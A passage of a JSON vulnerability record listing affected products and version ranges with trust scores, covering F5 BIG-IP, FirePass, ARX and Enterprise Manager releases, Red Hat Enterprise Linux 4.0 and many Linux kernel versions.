        "vendor": "f5",
        "version": "11.0.0"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "10.0.0"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "10.1.0"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "10.0.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "10.0.0"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.1"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "big-ip protocol security module",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "10.0.0"
      },
      {
        "model": "firepass",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "6.1.0"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.0.0"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "10.1.0"
      },
      {
        "model": "enterprise manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "2.1.0"
      },
      {
        "model": "arx",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "6.0.0"
      },
      {
        "model": "big-ip protocol security module",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "enterprise manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "2.3.0"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.0.0"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.0.0"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.0.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.0.0"
      },
      {
        "model": "big-ip protocol security module",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.0.0"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "big-ip application security manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "10.0.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "big-ip protocol security module",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "big-ip analytics",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.0.0"
      },
      {
        "model": "big-ip application security manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "big-ip wan optimization manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "10.0.0"
      },
      {
        "model": "enterprise manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "3.0.0"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "4.0"
      },
      {
        "model": "big-ip application security manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.0.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "firepass",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "7.0.0"
      },
      {
        "model": "big-ip application security manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "arx",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "6.4.0"
      },
      {
        "model": "big-ip wan optimization manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.0.0"
      },
      {
        "model": "big-ip analytics",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "big-ip wan optimization manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.7,
        "vendor": "linux",
        "version": "1.2.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.7,
        "vendor": "linux",
        "version": "1.3.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.7,
        "vendor": "linux",
        "version": "2.2.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.7,
        "vendor": "linux",
        "version": "2.2.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.7,
        "vendor": "linux",
        "version": "2.2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.7,
        "vendor": "linux",
        "version": "2.3.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.7,
        "vendor": "linux",
        "version": "2.3.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.7,
        "vendor": "linux",
        "version": "2.3.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.7,
        "vendor": "linux",
        "version": "2.3.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.7,
        "vendor": "linux",
        "version": "3.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.0.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.0.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.0.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.0.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.0.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.0.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.0.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.0.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.0.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.0.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.0.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.0.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.0.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.0.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.0.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.0.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.0.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.0.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.0.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.0.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.0.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.0.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.0.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.0.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.0.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.0.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.0.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.0.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.0.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.0.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.0.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.0.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.0.33"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.0.34"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.0.35"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.0.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.0.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.0.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.0.39"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.1.89"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.1.132"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.2.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.2.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.2.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.2.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.2.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.2.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.2.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.2.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.2.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.2.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.2.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.2.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.2.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.2.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.2.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.2.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.2.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.2.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.2.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.2.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.2.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.2.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.2.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.2.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.2.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.33"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.34"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.35"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.39"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.40"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.41"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.42"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.43"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.44"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.45"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.46"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.47"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.48"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.49"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.50"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.51"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.3.99"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.33"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.33.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.33.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.33.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.33.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.34"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.34.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.34.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.35"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.4.35.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
